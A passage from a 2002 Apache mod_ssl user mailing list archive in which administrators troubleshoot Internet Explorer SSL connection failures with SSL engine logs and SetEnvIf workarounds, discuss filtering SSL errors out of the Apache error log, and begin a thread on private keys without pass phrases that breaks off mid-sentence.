212.107.xx.xx, >Protocol: TLSv1, Cipher: EDH-RSA-DES-CBC3-SHA (168/168 bits) >[06/Feb/2002 10:29:42 09924] [info] Initial (No.1) HTTPS request received >for child 0 (server emedia.se:443) >[06/Feb/2002 10:29:42 09924] [trace] OpenSSL: Write: SSL negotiation >finished successfully >[06/Feb/2002 10:29:42 09924] [info] Connection to child 0 closed with >standard shutdown (server emedia.se:443, client 212.107.xx.xx) >-------------- > >Now with IE >--------------- >Connection to child 1 established (server emedia.se:443, client >212.107.xx.xx) >[06/Feb/2002 10:32:37 09925] [info] Seeding PRNG with 23177 bytes of >entropy >[06/Feb/2002 10:32:37 09925] [trace] OpenSSL: Handshake: start >[06/Feb/2002 10:32:37 09925] [trace] OpenSSL: Loop: before/accept >initialization >[06/Feb/2002 10:32:37 09925] [trace] OpenSSL: Loop: SSLv3 read client hello >A >[06/Feb/2002 10:32:37 09925] [trace] OpenSSL: Loop: SSLv3 write server hello >A >[06/Feb/2002 10:32:37 09925] [trace] OpenSSL: Loop: SSLv3 write certificate >A >[06/Feb/2002 10:32:37 09925] [trace] OpenSSL: Loop: SSLv3 write server done >A >[06/Feb/2002 10:32:37 09925] [trace] OpenSSL: Loop: SSLv3 flush data >[06/Feb/2002 10:32:37 09925] [trace] OpenSSL: Loop: SSLv3 read client key >exchange A >[06/Feb/2002 10:32:37 09925] [trace] OpenSSL: Loop: SSLv3 read finished A >[06/Feb/2002 10:32:37 09925] [trace] OpenSSL: Loop: SSLv3 write change >cipher spec A >[06/Feb/2002 10:32:37 09925] [trace] OpenSSL: Loop: SSLv3 write finished A >[06/Feb/2002 10:32:37 09925] [trace] OpenSSL: Loop: SSLv3 flush data >[06/Feb/2002 10:32:37 09925] [trace] Inter-Process Session Cache: >request=SET st >atus=OK id=C52B666B384B0E4DD7F0BDB6D6F8E8118E3AA5748DF993A553C4CC4E2FB86606 >timeout=600s (session caching) >[06/Feb/2002 10:32:37 09925] [trace] OpenSSL: Handshake: done >[06/Feb/2002 10:32:37 09925] [info] Connection: Client IP: 212.107.xx.xx, >Protocol: SSLv3, Cipher: RC4-MD5 (128/128 bits) >[06/Feb/2002 10:32:37 09925] [trace] OpenSSL: Write: SSL negotiation >finished successfully >[06/Feb/2002 10:32:37 09925] [info] Connection to child 1 closed with >standard shutdown (server emedia.se:443, client 212.107.xx.xx) >---------- > > >Best regards, >Thomas. > >______________________________________________________________________ >Apache Interface to OpenSSL (mod_ssl) www.modssl.org >User Support Mailing List modssl-users@modssl.org >Automated List Manager majordomo@modssl.org >______________________________________________________________________ >Apache Interface to OpenSSL (mod_ssl) www.modssl.org >User Support Mailing List modssl-users@modssl.org >Automated List Manager majordomo@modssl.org >______________________________________________________________________ >Apache Interface to OpenSSL (mod_ssl) www.modssl.org >User Support Mailing List modssl-users@modssl.org >Automated List Manager majordomo@modssl.org > ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Feb 6 19:22:14 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id TAA20869; Wed, 6 Feb 2002 19:21:09 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from qeo02001.t-online.net id TAA20855; Wed, 6 Feb 2002 19:20:41 +0100 (MET) Received: from qeo01007.da.t-online.net (qeo01007.da.t-online.net [192.168.197.4]) by qeo02001.t-online.net (8.9.3/8.9.3/Debian 8.9.3-21) with ESMTP id TAA12406 for ; Wed, 6 Feb 2002 19:20:35 +0100 Received: from qeo01006.da.t-online.net ([192.168.197.66]) by qeo01007.da.t-online.net (Netscape Messaging Server 4.15) with ESMTP id GR4IYB01.G0F for ; Wed, 6 Feb 2002 19:20:35 +0100 Received: from t-online.net ([192.168.193.21]) by qeo01006.da.t-online.net (Netscape Messaging Server 4.15) with ESMTP id GR4IYB01.318 for ; Wed, 6 Feb 2002 19:20:35 +0100 Message-ID: <3C6173F3.51C8AC2D@t-online.net> Date: Wed, 06 Feb 2002 19:20:35 +0100 From: "Bert Courtin" Organization: T-Online International AG X-Sender: "Bert Courtin" X-Mailer: Mozilla 4.51 [de]C-CCK-MCD DTOS 1999062601 IT/DV NBE (WinNT; U) X-Accept-Language: de,en MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Re: Stop mod_ssl from writing errors to the general Apache error logfile References: <3C60177B.3FC32DA9@t-online.net> <3C60ECC9.677A8615@bourse.ch> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Bert Courtin" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi Owen, thank you for your reply:-) ... but - when sending the output for the ErrorLog to /dev/null I don't have an ErrorLog at all, and that's not really what I needed.. I dont what no ErrorLog at all but just no SSL errors in my ErrorLog (even inside the virtual host!). I don't see the point that if I set SSLLogLevel to none that this only means that no dedicated SSL logging is done, but messages of level ``error'' are still written to the general Apache error logfile. In my opinion there should be an option "quite" or "disabled" available which turns off this behaviour. For me meanwhile I now playing around with piped logging using a statemend like: ErrorLog "| /usr/bin/fgrep -v 'errno: 131' | /usr/bin/fgrep -v 'SSL handshake interrupted by system' >> /var/log/apache_1.3.23/logs/error_log" Kind regards, Bert Courtin Owen Boyle schrieb: > Bert Courtin wrote: > > > > I wonder how I can stop mod_ssl from writing errors to the general > > Apache error logfile. > > > > Since your SSL site is defined by a virtualhost, simply put a separate > ErrorLog directive in the SSL VH. Errors generated by that VH will go > there instead of the global error_log. If you really don't want to see > SSL errors at all, just do: > > < in SSL VH> > ErrorLog /dev/null > > Rgds, > > Owen Boyle. > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org -- T-Online International AG DCM Waldstrasse 3 64331 Weiterstadt Tel.: +49 (0)6151 680 7512 ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Feb 6 19:27:04 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id TAA21110; Wed, 6 Feb 2002 19:25:13 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from electricrain.com id TAA21024; Wed, 6 Feb 2002 19:24:32 +0100 (MET) Received: (qmail 3640 invoked by uid 501); 6 Feb 2002 18:24:29 -0000 Date: Wed, 6 Feb 2002 10:24:29 -0800 From: Daniel Sully To: modssl-users@modssl.org Subject: Re: Problem with IE Message-ID: <20020206182429.GE11325@electricrain.com> References: <8A87A19E6153D4119FA800508BDF0932E0E311@USHEM202> <3C617216.4070401@tvdata.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <3C617216.4070401@tvdata.com> User-Agent: Mutt/1.3.23.2i X-Invader-Zim: (returning from bathroom) My BUSINESS...is done. Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Daniel Sully X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users I am finding it very hard to believe that even late versions of IE, 5.5, 6.x have these problems, yet I encounter wacky form post bugs when I do not downgrade the connection. Is there nothing else that can be done? Is no one that is running Apache+mod_ssl able to use KeepAlives or HTTP/1.1, and are suffering severe performance hits when using MSIE? Once upon a time Shain Miley shaped the electrons to say... > I fixed a problem this morning by adding this line to my httpd.conf file: > > SetEnvIf User-Agent ".*MSIE.*" nokeepalive ssl-unclean-shutdown > downgrade-1.0 force-response-1.0 > > Shain > > > Kuczborski, Carol L wrote: > > >Sorry, it is NOT the recommendation made in mod_ssl.... But it worked for > >me. > > > >Try the following setting for the IE browser in the httpd.conf file. I > >know > >it is the recommendation made in the mod_ssl FAQ, but it seemed to help me. > >I had the same problem you are having and researched it for months. After > >making the change to the http.conf below (and applying a patch from Oracle > >to the ApacheModuleSSL.dll file on Windows NT), it reduced the intermittent > >"Cannot find server or DNS error" and "Page cannot be displayed" messages > >received when using the IE browser. I never received these errors when > >using the Netscape browser. > > > >SetEnvIf User-Agent ".*MSIE.*" ssl-unclean-shutdown -D -- God, root, what is difference? ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Feb 6 23:22:14 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id XAA01755; Wed, 6 Feb 2002 23:21:49 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mta6.snfc21.pbi.net id XAA01615; Wed, 6 Feb 2002 23:19:41 +0100 (MET) Received: from christopher.tokpela.com ([63.200.61.35]) by mta6.snfc21.pbi.net (iPlanet Messaging Server 5.1 (built May 7 2001)) with ESMTP id <0GR400E4XU0QD1@mta6.snfc21.pbi.net> for modssl-users@modssl.org; Wed, 06 Feb 2002 14:19:39 -0800 (PST) Date: Wed, 06 Feb 2002 14:17:26 -0800 From: Christopher Taranto Subject: Re[2]: Problem with IE In-reply-to: <3C617216.4070401@tvdata.com> X-Sender: efaqs.com/christopher@opal.he.net To: modssl-users@modssl.org Message-id: <4.3.2.7.2.20020206141616.03e42dc0@opal.he.net> MIME-version: 1.0 X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Content-type: text/plain; charset=us-ascii; format=flowed Content-transfer-encoding: 7BIT References: <8A87A19E6153D4119FA800508BDF0932E0E311@USHEM202> Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Christopher Taranto X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Shain, Do you have a public URL that I can try a browser on? I have the same in my httpd.conf file and it does not fix my problem with the IE browser that I have installed in my office. Chris At 01:12 PM 2/6/02 -0500, you wrote: >I fixed a problem this morning by adding this line to my httpd.conf file: > >SetEnvIf User-Agent ".*MSIE.*" nokeepalive ssl-unclean-shutdown >downgrade-1.0 force-response-1.0 > >Shain > > >Kuczborski, Carol L wrote: > >>Sorry, it is NOT the recommendation made in mod_ssl.... But it worked for >>me. >> >>Carol Kuczborski >>EDS - Enabling Business Solutions >>MS A6N-B47 >>13600 EDS Drive >>Herndon, VA 20171 >> >>* phone: +01-703-742-1025 (8-432) >>* mailto:carol.kuczborski@eds.com >>www.eds.com >> >> >> >>-----Original Message----- >>From: Kuczborski, Carol L Sent: Wednesday, February 06, 2002 10:09 AM >>To: 'modssl-users@modssl.org' >>Subject: RE: Problem with IE >> >> >>Try the following setting for the IE browser in the httpd.conf file. I know >>it is the recommendation made in the mod_ssl FAQ, but it seemed to help me. >>I had the same problem you are having and researched it for months. After >>making the change to the http.conf below (and applying a patch from Oracle >>to the ApacheModuleSSL.dll file on Windows NT), it reduced the intermittent >>"Cannot find server or DNS error" and "Page cannot be displayed" messages >>received when using the IE browser. I never received these errors when >>using the Netscape browser. >> >>SetEnvIf User-Agent ".*MSIE.*" ssl-unclean-shutdown >> >>Carol Kuczborski >>EDS - Enabling Business Solutions >>MS A6N-B47 >>13600 EDS Drive >>Herndon, VA 20171 >> >>* phone: +01-703-742-1025 (8-432) >>* mailto:carol.kuczborski@eds.com >>www.eds.com >> >> >> >>-----Original Message----- >>From: Thomas Lepik [mailto:walker@jalutaja.ee] >>Sent: Wednesday, February 06, 2002 3:48 AM >>To: modssl-users@modssl.org >>Subject: Problem with IE >> >> >>Hello, >> >>I compiled apache-1.3.2+mod_ssl-2.8.6+php-4.1.1 sucessfully on RH 7.2 Linux. >> >>I created certificates, modified httpd.conf for my needs and started apache >>with ssl option. >>Things seemed to be working fine - even tested with lynx browser to see >>wheather https://localhost >>gives a connection - and it did! But when tested with M$ IE 5.0 (with high >>encryption patch >>that allows 128 bit chipher), I constantly ran into "page cannot be >>displayed" - eventhough >>I modified httpd.conf's SSL section several times as suggested here before. >>(if IE setenv xxx and, >>SSL -v3, session cache things) Any time - lynx displays the page and IE >>doesn't. >> >>Here are two samples from my ssl_engine_log. First one with lynx browser, >>second one with my >>troublesome IE. (also included server startup lines to ensure that server is >>running smoothly) >> >>server startup: >>----------------- >>06/Feb/2002 10:29:06 09923] [info] Init: Configuring server emedia.se:443 >>for SSL protocol >>[06/Feb/2002 10:29:06 09923] [trace] Init: (emedia.se:443) Creating new SSL >>context (protocols: SSLv2, SSLv3, TLSv1) >>[06/Feb/2002 10:29:06 09923] [trace] Init: (emedia.se:443) Configuring >>permitted SSL ciphers >>[ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP] >>[06/Feb/2002 10:29:06 09923] [trace] Init: (emedia.se:443) Configuring RSA >>server certificate >>[06/Feb/2002 10:29:06 09923] [trace] Init: (emedia.se:443) Configuring RSA >>server private key >>[06/Feb/2002 10:29:06 09923] [trace] Init: (emedia.se:443) Configuring >>server certificate chain (1 CA certificate) >>------------- >> >>Lynx browser: >>---------------- >>[06/Feb/2002 10:29:41 09924] [info] Connection to child 0 established >>(server emedia.se:443, client 212.107.xx.xx) >>[06/Feb/2002 10:29:41 09924] [info] Seeding PRNG with 23177 bytes of >>entropy >>[06/Feb/2002 10:29:41 09924] [trace] OpenSSL: Handshake: start >>[06/Feb/2002 10:29:41 09924] [trace] OpenSSL: Loop: before/accept >>initialization >>[06/Feb/2002 10:29:41 09924] [trace] OpenSSL: Loop: SSLv3 read client hello >>A >>[06/Feb/2002 10:29:41 09924] [trace] OpenSSL: Loop: SSLv3 write server hello >>A >>[06/Feb/2002 10:29:41 09924] [trace] OpenSSL: Loop: SSLv3 write certificate >>A >>[06/Feb/2002 10:29:41 09924] [trace] OpenSSL: Loop: SSLv3 write key exchange >>A >>[06/Feb/2002 10:29:41 09924] [trace] OpenSSL: Loop: SSLv3 write server done >>A >>[06/Feb/2002 10:29:41 09924] [trace] OpenSSL: Loop: SSLv3 flush data >>[06/Feb/2002 10:29:42 09924] [trace] OpenSSL: Loop: SSLv3 read client key >>exchange A >>[06/Feb/2002 10:29:42 09924] [trace] OpenSSL: Loop: SSLv3 read finished A >>[06/Feb/2002 10:29:42 09924] [trace] OpenSSL: Loop: SSLv3 write change >>cipher spec A >>[06/Feb/2002 10:29:42 09924] [trace] OpenSSL: Loop: SSLv3 write finished A >>[06/Feb/2002 10:29:42 09924] [trace] OpenSSL: Loop: SSLv3 flush data >>[06/Feb/2002 10:29:42 09924] [trace] Inter-Process Session Cache: >>request=SET status=OK >>id=6ACADD8B778A6BFFDF0E22CCC0023F4B080C297422FA989923FC36348E3FFD83 >>timeout=599s (session caching) >>[06/Feb/2002 10:29:42 09924] [trace] OpenSSL: Handshake: done >>[06/Feb/2002 10:29:42 09924] [info] Connection: Client IP: 212.107.xx.xx, >>Protocol: TLSv1, Cipher: EDH-RSA-DES-CBC3-SHA (168/168 bits) >>[06/Feb/2002 10:29:42 09924] [info] Initial (No.1) HTTPS request received >>for child 0 (server emedia.se:443) >>[06/Feb/2002 10:29:42 09924] [trace] OpenSSL: Write: SSL negotiation >>finished successfully >>[06/Feb/2002 10:29:42 09924] [info] Connection to child 0 closed with >>standard shutdown (server emedia.se:443, client 212.107.xx.xx) >>-------------- >> >>Now with IE >>--------------- >>Connection to child 1 established (server emedia.se:443, client >>212.107.xx.xx) >>[06/Feb/2002 10:32:37 09925] [info] Seeding PRNG with 23177 bytes of >>entropy >>[06/Feb/2002 10:32:37 09925] [trace] OpenSSL: Handshake: start >>[06/Feb/2002 10:32:37 09925] [trace] OpenSSL: Loop: before/accept >>initialization >>[06/Feb/2002 10:32:37 09925] [trace] OpenSSL: Loop: SSLv3 read client hello >>A >>[06/Feb/2002 10:32:37 09925] [trace] OpenSSL: Loop: SSLv3 write server hello >>A >>[06/Feb/2002 10:32:37 09925] [trace] OpenSSL: Loop: SSLv3 write certificate >>A >>[06/Feb/2002 10:32:37 09925] [trace] OpenSSL: Loop: SSLv3 write server done >>A >>[06/Feb/2002 10:32:37 09925] [trace] OpenSSL: Loop: SSLv3 flush data >>[06/Feb/2002 10:32:37 09925] [trace] OpenSSL: Loop: SSLv3 read client key >>exchange A >>[06/Feb/2002 10:32:37 09925] [trace] OpenSSL: Loop: SSLv3 read finished A >>[06/Feb/2002 10:32:37 09925] [trace] OpenSSL: Loop: SSLv3 write change >>cipher spec A >>[06/Feb/2002 10:32:37 09925] [trace] OpenSSL: Loop: SSLv3 write finished A >>[06/Feb/2002 10:32:37 09925] [trace] OpenSSL: Loop: SSLv3 flush data >>[06/Feb/2002 10:32:37 09925] [trace] Inter-Process Session Cache: >>request=SET st >>atus=OK id=C52B666B384B0E4DD7F0BDB6D6F8E8118E3AA5748DF993A553C4CC4E2FB86606 >>timeout=600s (session caching) >>[06/Feb/2002 10:32:37 09925] [trace] OpenSSL: Handshake: done >>[06/Feb/2002 10:32:37 09925] [info] Connection: Client IP: 212.107.xx.xx, >>Protocol: SSLv3, Cipher: RC4-MD5 (128/128 bits) >>[06/Feb/2002 10:32:37 09925] [trace] OpenSSL: Write: SSL negotiation >>finished successfully >>[06/Feb/2002 10:32:37 09925] [info] Connection to child 1 closed with >>standard shutdown (server emedia.se:443, client 212.107.xx.xx) >>---------- >> >> >>Best regards, >>Thomas. >> >>______________________________________________________________________ >>Apache Interface to OpenSSL (mod_ssl) www.modssl.org >>User Support Mailing List modssl-users@modssl.org >>Automated List Manager majordomo@modssl.org >>______________________________________________________________________ >>Apache Interface to OpenSSL (mod_ssl) www.modssl.org >>User Support Mailing List modssl-users@modssl.org >>Automated List Manager majordomo@modssl.org >>______________________________________________________________________ >>Apache Interface to OpenSSL (mod_ssl) www.modssl.org >>User Support Mailing List modssl-users@modssl.org >>Automated List Manager majordomo@modssl.org > > > >______________________________________________________________________ >Apache Interface to OpenSSL (mod_ssl) www.modssl.org >User Support Mailing List modssl-users@modssl.org >Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Feb 6 23:23:07 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id XAA01861; Wed, 6 Feb 2002 23:22:53 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from plmler5.mail.eds.com id XAA01595; Wed, 6 Feb 2002 23:19:17 +0100 (MET) Received: from plmlir1.mail.eds.com (plmlir1-2.mail.eds.com [199.228.143.132]) by plmler5.mail.eds.com (8.11.6/8.11.3) with ESMTP id g16MJBl13591 for ; Wed, 6 Feb 2002 16:19:11 -0600 Received: from plmlir1.mail.eds.com (localhost [127.0.0.1]) by plmlir1.mail.eds.com (8.11.6/8.11.3) with ESMTP id g16MJ9i22538 for ; Wed, 6 Feb 2002 16:19:09 -0600 (CST) Received: from usplm002.exch.eds.com (USPLM002.txpln.us.eds.com [198.132.135.7]) by plmlir1.mail.eds.com (8.11.6/8.11.3) with ESMTP id g16MJ8p22523 for ; Wed, 6 Feb 2002 16:19:08 -0600 (CST) Received: by USPLM002.txpln.us.eds.com with Internet Mail Service (5.5.2655.51) id <1NW7LPVQ>; Wed, 6 Feb 2002 17:19:09 -0500 Message-ID: <8A87A19E6153D4119FA800508BDF0932E0E31F@USHEM202> From: "Kuczborski, Carol L" To: "'modssl-users@modssl.org'" Subject: RE: Problem with IE Date: Wed, 6 Feb 2002 17:19:00 -0500 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2655.51) Content-Type: text/plain Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Kuczborski, Carol L" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users That is the suggestion in the mod_ssl FAQ, but it did not work for me. I had to remove the forcing of http 1.0 and nokeepalive. Carol Kuczborski EDS - Enabling Business Solutions MS A6N-B47 13600 EDS Drive Herndon, VA 20171 * phone: +01-703-742-1025 (8-432) * mailto:carol.kuczborski@eds.com www.eds.com -----Original Message----- From: Shain Miley [mailto:smiley@tvdata.com] Sent: Wednesday, February 06, 2002 1:13 PM To: modssl-users@modssl.org Subject: Re: Problem with IE I fixed a problem this morning by adding this line to my httpd.conf file: SetEnvIf User-Agent ".*MSIE.*" nokeepalive ssl-unclean-shutdown downgrade-1.0 force-response-1.0 Shain Kuczborski, Carol L wrote: >Sorry, it is NOT the recommendation made in mod_ssl.... But it worked for >me. > >Carol Kuczborski >EDS - Enabling Business Solutions >MS A6N-B47 >13600 EDS Drive >Herndon, VA 20171 > >* phone: +01-703-742-1025 (8-432) >* mailto:carol.kuczborski@eds.com >www.eds.com > > > >-----Original Message----- >From: Kuczborski, Carol L >Sent: Wednesday, February 06, 2002 10:09 AM >To: 'modssl-users@modssl.org' >Subject: RE: Problem with IE > > >Try the following setting for the IE browser in the httpd.conf file. I know >it is the recommendation made in the mod_ssl FAQ, but it seemed to help me. >I had the same problem you are having and researched it for months. After >making the change to the http.conf below (and applying a patch from Oracle >to the ApacheModuleSSL.dll file on Windows NT), it reduced the intermittent >"Cannot find server or DNS error" and "Page cannot be displayed" messages >received when using the IE browser. I never received these errors when >using the Netscape browser. > >SetEnvIf User-Agent ".*MSIE.*" ssl-unclean-shutdown > >Carol Kuczborski >EDS - Enabling Business Solutions >MS A6N-B47 >13600 EDS Drive >Herndon, VA 20171 > >* phone: +01-703-742-1025 (8-432) >* mailto:carol.kuczborski@eds.com >www.eds.com > > > >-----Original Message----- >From: Thomas Lepik [mailto:walker@jalutaja.ee] >Sent: Wednesday, February 06, 2002 3:48 AM >To: modssl-users@modssl.org >Subject: Problem with IE > > >Hello, > >I compiled apache-1.3.2+mod_ssl-2.8.6+php-4.1.1 sucessfully on RH 7.2 Linux. > >I created certificates, modified httpd.conf for my needs and started apache >with ssl option. >Things seemed to be working fine - even tested with lynx browser to see >wheather https://localhost >gives a connection - and it did! But when tested with M$ IE 5.0 (with high >encryption patch >that allows 128 bit chipher), I constantly ran into "page cannot be >displayed" - eventhough >I modified httpd.conf's SSL section several times as suggested here before. >(if IE setenv xxx and, >SSL -v3, session cache things) Any time - lynx displays the page and IE >doesn't. > >Here are two samples from my ssl_engine_log. First one with lynx browser, >second one with my >troublesome IE. (also included server startup lines to ensure that server is >running smoothly) > >server startup: >----------------- >06/Feb/2002 10:29:06 09923] [info] Init: Configuring server emedia.se:443 >for SSL protocol >[06/Feb/2002 10:29:06 09923] [trace] Init: (emedia.se:443) Creating new SSL >context (protocols: SSLv2, SSLv3, TLSv1) >[06/Feb/2002 10:29:06 09923] [trace] Init: (emedia.se:443) Configuring >permitted SSL ciphers >[ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP] >[06/Feb/2002 10:29:06 09923] [trace] Init: (emedia.se:443) Configuring RSA >server certificate >[06/Feb/2002 10:29:06 09923] [trace] Init: (emedia.se:443) Configuring RSA >server private key >[06/Feb/2002 10:29:06 09923] [trace] Init: (emedia.se:443) Configuring >server certificate chain (1 CA certificate) >------------- > >Lynx browser: >---------------- >[06/Feb/2002 10:29:41 09924] [info] Connection to child 0 established >(server emedia.se:443, client 212.107.xx.xx) >[06/Feb/2002 10:29:41 09924] [info] Seeding PRNG with 23177 bytes of >entropy >[06/Feb/2002 10:29:41 09924] [trace] OpenSSL: Handshake: start >[06/Feb/2002 10:29:41 09924] [trace] OpenSSL: Loop: before/accept >initialization >[06/Feb/2002 10:29:41 09924] [trace] OpenSSL: Loop: SSLv3 read client hello >A >[06/Feb/2002 10:29:41 09924] [trace] OpenSSL: Loop: SSLv3 write server hello >A >[06/Feb/2002 10:29:41 09924] [trace] OpenSSL: Loop: SSLv3 write certificate >A >[06/Feb/2002 10:29:41 09924] [trace] OpenSSL: Loop: SSLv3 write key exchange >A >[06/Feb/2002 10:29:41 09924] [trace] OpenSSL: Loop: SSLv3 write server done >A >[06/Feb/2002 10:29:41 09924] [trace] OpenSSL: Loop: SSLv3 flush data >[06/Feb/2002 10:29:42 09924] [trace] OpenSSL: Loop: SSLv3 read client key >exchange A >[06/Feb/2002 10:29:42 09924] [trace] OpenSSL: Loop: SSLv3 read finished A >[06/Feb/2002 10:29:42 09924] [trace] OpenSSL: Loop: SSLv3 write change >cipher spec A >[06/Feb/2002 10:29:42 09924] [trace] OpenSSL: Loop: SSLv3 write finished A >[06/Feb/2002 10:29:42 09924] [trace] OpenSSL: Loop: SSLv3 flush data >[06/Feb/2002 10:29:42 09924] [trace] Inter-Process Session Cache: >request=SET status=OK >id=6ACADD8B778A6BFFDF0E22CCC0023F4B080C297422FA989923FC36348E3FFD83 >timeout=599s (session caching) >[06/Feb/2002 10:29:42 09924] [trace] OpenSSL: Handshake: done >[06/Feb/2002 10:29:42 09924] [info] Connection: Client IP: 212.107.xx.xx, >Protocol: TLSv1, Cipher: EDH-RSA-DES-CBC3-SHA (168/168 bits) >[06/Feb/2002 10:29:42 09924] [info] Initial (No.1) HTTPS request received >for child 0 (server emedia.se:443) >[06/Feb/2002 10:29:42 09924] [trace] OpenSSL: Write: SSL negotiation >finished successfully >[06/Feb/2002 10:29:42 09924] [info] Connection to child 0 closed with >standard shutdown (server emedia.se:443, client 212.107.xx.xx) >-------------- > >Now with IE >--------------- >Connection to child 1 established (server emedia.se:443, client >212.107.xx.xx) >[06/Feb/2002 10:32:37 09925] [info] Seeding PRNG with 23177 bytes of >entropy >[06/Feb/2002 10:32:37 09925] [trace] OpenSSL: Handshake: start >[06/Feb/2002 10:32:37 09925] [trace] OpenSSL: Loop: before/accept >initialization >[06/Feb/2002 10:32:37 09925] [trace] OpenSSL: Loop: SSLv3 read client hello >A >[06/Feb/2002 10:32:37 09925] [trace] OpenSSL: Loop: SSLv3 write server hello >A >[06/Feb/2002 10:32:37 09925] [trace] OpenSSL: Loop: SSLv3 write certificate >A >[06/Feb/2002 10:32:37 09925] [trace] OpenSSL: Loop: SSLv3 write server done >A >[06/Feb/2002 10:32:37 09925] [trace] OpenSSL: Loop: SSLv3 flush data >[06/Feb/2002 10:32:37 09925] [trace] OpenSSL: Loop: SSLv3 read client key >exchange A >[06/Feb/2002 10:32:37 09925] [trace] OpenSSL: Loop: SSLv3 read finished A >[06/Feb/2002 10:32:37 09925] [trace] OpenSSL: Loop: SSLv3 write change >cipher spec A >[06/Feb/2002 10:32:37 09925] [trace] OpenSSL: Loop: SSLv3 write finished A >[06/Feb/2002 10:32:37 09925] [trace] OpenSSL: Loop: SSLv3 flush data >[06/Feb/2002 10:32:37 09925] [trace] Inter-Process Session Cache: >request=SET st >atus=OK id=C52B666B384B0E4DD7F0BDB6D6F8E8118E3AA5748DF993A553C4CC4E2FB86606 >timeout=600s (session caching) >[06/Feb/2002 10:32:37 09925] [trace] OpenSSL: Handshake: done >[06/Feb/2002 10:32:37 09925] [info] Connection: Client IP: 212.107.xx.xx, >Protocol: SSLv3, Cipher: RC4-MD5 (128/128 bits) >[06/Feb/2002 10:32:37 09925] [trace] OpenSSL: Write: SSL negotiation >finished successfully >[06/Feb/2002 10:32:37 09925] [info] Connection to child 1 closed with >standard shutdown (server emedia.se:443, client 212.107.xx.xx) >---------- > > >Best regards, >Thomas. > >______________________________________________________________________ >Apache Interface to OpenSSL (mod_ssl) www.modssl.org >User Support Mailing List modssl-users@modssl.org >Automated List Manager majordomo@modssl.org >______________________________________________________________________ >Apache Interface to OpenSSL (mod_ssl) www.modssl.org >User Support Mailing List modssl-users@modssl.org >Automated List Manager majordomo@modssl.org >______________________________________________________________________ >Apache Interface to OpenSSL (mod_ssl) www.modssl.org >User Support Mailing List modssl-users@modssl.org >Automated List Manager majordomo@modssl.org > ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Feb 7 01:17:09 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id BAA09467; Thu, 7 Feb 2002 01:16:13 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from darkstar.sysinfo.com id BAA09438; Thu, 7 Feb 2002 01:15:37 +0100 (MET) Received: from localhost (dufresne@localhost) by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id TAA10900 for ; Wed, 6 Feb 2002 19:21:09 -0500 Date: Wed, 6 Feb 2002 19:21:09 -0500 (EST) From: "R. DuFresne" To: modssl-users@modssl.org Subject: Re: How do I create a un-encrypted private key (without pass phrase)? In-Reply-To: Message-ID: Organization: sysinfo.com X-Subliminal: If at first you don't suck seed... X-Admonition: The Good thing about potential is X-Admonition2: as long as you do nothing X-Admonition3: you'll always have it. MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "R. DuFresne" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Wed, 6 Feb 2002, Cliff Woolley wrote: > On Wed, 6 Feb 2002, Owen Boyle wrote: > > > Having a password means that no-one can use your certificate - even if > > they obtain a copy of it. They can load the cert into their server but > > it won't let the server come up unless they know the password. > > > > The downside is that you have to type in the password personally to > > start apache. Tricks like putting the password in a program and so on > > just shift the risk - the hacker just needs to grab the program. > > > > My personal tuppence-worth is that if you have a machine where there is > > a risk that hackers can steal root-privileged files then you should not > > be running it as an SSL web-server (if 